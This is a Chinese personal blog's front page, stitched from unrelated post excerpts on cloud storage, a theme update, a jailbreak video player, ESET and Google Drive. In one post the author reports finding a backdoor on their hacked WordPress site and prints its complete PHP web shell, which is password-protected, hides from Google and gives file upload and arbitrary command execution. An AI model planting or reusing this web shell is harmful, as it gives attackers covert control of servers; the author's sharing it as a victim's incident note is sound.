
Bitcasa is revolutionizing personal cloud storage! Unlike other cloud-based storage solutions that simply copy your files to the cloud, Bitcasa gives you infinite storage on your desktop. In fact, our virtual storage model allows you to easily sync all your data across devices, instantly share large files with friends and family and provides a secure alternative to other online backup solutions. You never have to worry about your data again.
现在云就是你的硬盘。这不是几十GB、几十TB的概念,而是整个云,近乎无限的存储,这项服务的提供者就是Bitcasa。
这家公司发布的这项新的云存储同步以及共享服务把其他竞争对手,像DropBox、SkyDrive之流远远甩在身后。实际上,除了相当有限的价格和几乎无限的存储以外,这项服务最具颠覆性的东西在于它跟设备的完全集成。服务无所不在,但你看不到它,文件到存盘到计算机的时候实际上是写到云上面去的。云就是你的硬盘,而你的实际硬盘只是缓存。
用云来存储文件或者在设备之间同步文件当然都不是什么新点子。Dropbox、SkyDrive、Google Docs、Amazon有在线存储服务,Mozy、Carbonite、Backblaze等提供云备份,Megaupload或者YouSendIt实现云共享。
但是Bitcasa跟这些都不一样。
你存盘的时候,Bitcasa就把那些1和0写到服务器端的云设施上面。对于文件本身它一无所知。它看不见文件名,也不知道文件内容,谁写了这个文件它也不了解。同时因为数据在客户端是加密的,Bitcasa甚至连自己存的东西是什么都不知道。
Bitcasa的共享也很简单:只需拷贝粘贴文件或目录的链接(是一个URL地址,右键可见)然后通过邮件、IM或别的什么服务发给某人即可。接收者只需点击链接就可以直接把东西下到桌面。


more…

算起来差不多折腾了一天,总算是把G+基本更新完了……
我会告诉你费了200抽的面纸一包么?
嗯,评论部分的样式还是沿用了Key君的,实在是懒得挊了。
目前支持最小分辨率是宽度1280,再小的话就不好布局,高度的话,除非你非要把浏览器窗口缩的一丁点大,不然基本没什么大问题。
不过文章内容一栏没法实现宽度自适应,导致分辨率过大会有很大一片空白……
另外还有一些问题有待解决,比如左侧栏图标拖动等。本来已经想好参考无冷大湿的px555主题那个鼠标拖动的效果,但是无奈没弄懂Google那三个点旋转的效果,所以,嗯,再说吧。
其他一些jQuery也都是以前的,基本没怎么修改。
嗯。欢迎吐槽。
睡觉了。
more…
个人感觉应该是WordPress的什么漏洞被利用了,导致网站被插了后门。
不过查看文件时间的话,是3月多就有了……
只能怪吾不小心了。
data.php
<?php if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; } $auth_pass = "99cbbc16c290d7024f7bcac74283a516"; //md5(v0ld3m0rt313373) = 99cbbc16c290d7024f7bcac74283a516 @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); function printLogin() { ?> <center> <form method=post> Password: <input type=password name=pass><input type=submit value='>>'> </form></center> <?php exit; } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) { if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; } else { printLogin(); } } if(isset($_GET['act'])) { $action = trim($_GET['act']); switch($action) { case 'uploader': echo '<b>'.php_uname().'</b><br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) { echo '<b>Upload success!</b><br>'.$_POST['uploadto']."/".$_FILES['file']['name']; } else { echo '<b>Upload failed!</b>'; } } break; case 'exec': if(isset($_GET['cmd'])) { $cmd = $_GET['cmd']; echo ''; echo ex($cmd); echo ''; } else { die('No command to be executed!'); } break; default: header("HTTP/1.0 404 Not Found"); break; } } else { header("HTTP/1.0 404 Not Found"); } function ex($in) { $out = ''; if(function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); }elseif(function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); }elseif(function_exists('shell_exec')) { $out = shell_exec($in); }elseif(is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } ?>
error_log
[30-Apr-2012 14:49:54] PHP Warning: parse_url(://PeeMa.us) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/PeeMau/public_html/wp-includes/pluggable.php on line 943 [30-Apr-2012 14:49:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/PeeMau/public_html/wp-includes/pluggable.php:943) in /home/PeeMau/public_html/wp-includes/pluggable.php on line 866 [01-May-2012 11:42:23] PHP Warning: parse_url(://PeeMa.us) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/peemau/public_html/wp-includes/pluggable.php on line 943 [01-May-2012 11:42:23] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/peemau/public_html/wp-includes/pluggable.php:943) in /home/peemau/public_html/wp-includes/pluggable.php on line 866
以及检查是否以下目录:/wp-content/plugins/helo/
原始的Hello Dolly插件仅仅是plugins目录下的hello.php文件而已。

软件简介:
RushPlayer & RushPlayer+(Plus)是同一个作者针对不同的受众开发的2个不同的版本的软件。
RushPlayer是在苹果App Store商店销售的。发售对象是支持正版的用户。支持本地播放,流媒体和部分电视台节目也有些cydia源破解后制作成deb版本在线安装。
RushPlayer+(Plus)发售对象是需要更高的体验的越狱用户,前提是越狱用户。相对RushPlayer 增加了很多“avi”格式文件的支持。不同的API,支持高清视频流畅播放。(支持的格式还在逐步完善中)
RushPlayer+(Plus)是针对越狱用户的升级版,使用了私有API,对于h264编码的视频可以做到完全流畅哦。 还新增了不少新的功能。RushPlayer+ is different from RushPlayer which is on AppStore. RushPlayer+ uses private api to decode h264 encoded videos. which provides you flawless playback speed even with 1080p videos. It is much more powerful than RushPlayer, Thanks Apple.
With Rushplayer+, you can experience stunning high-quality 720p 1080p videos in an extensive number of formats: RMVB WMV AVI MKV MP4 etc. Based on the team’s more-than-a-decade’s experience in audio and video optimization technique, Rushplayer embodies the advanced dual core decode technology, and can ensure you much better experience compared with other players of a similar type.
Thereafter, you can watch all high-definition videos directly on ios equipments with no need to decode them. The file management function makes it easy for you to create and edit your own multimedia playlist in ios equipments.
Since the publishment of the first edition, Rushplayer has fascinated users with its optimization level. Users have given numerous positive feedbacks on its smooth playing of high definition video in various formats which used to be limited to pc. Rushplayer is by far the best player on iphone and ipad to play videos in formats of RMVB WMV MP4 AVi, etc.
if you can’t run rushplayer+ after installation, please send an email to run2rush@gmail.com for help.In this version:
fix app crash bug for devices with ios version 4.3.x
1.resolve random-named app folders in file browser (like iFile)
2.update app logo
3.fix stream media bugs
![]()
ESET成立于1992年,是一家面向企业与个人用户的全球性的计算机安全软件提供商,其获奖产品——NOD32防病毒软件系统,能够针对各种已知或未知病毒、间谍软件(spyware)、rootkits和其他恶意软件为计算机系统提供实时保护。ESET NOD32占用系统资源最少,侦测速度最快,可以提供最有效的保护,并且比其他任何防病毒产品获得了更多的Virus Bulletin 100%奖项。ESET连续五年被评为“德勤高科技快速成长500强”(Deloitte’s Technology Fast 500)公司,拥有广泛的合作伙伴网络,包括佳能、戴尔、微软等国际知名公司,在布拉迪斯拉发(斯洛伐克)、布里斯托尔(英国)、布宜诺斯艾利斯(阿根廷)、布拉格(捷克)、圣地亚哥(美国)等地均设有办事处,代理机构覆盖全球超过100个国家。

Google在昨天(4.25)正式推出了自家的云存储服务Google Drive,中文名为“Google 云端硬盘”,这还真是个蛋疼的名字。
吾也在第一时间去申请了体验的资格,Galaxy Nexus上也早早的安装好了这个应用。
刚才习惯性的开了WiFi准备看看有什么需要更新的时候,Gmail提示收到了Google Drive的邮件,于是,Google Drive可以使用了~

more…
近期评论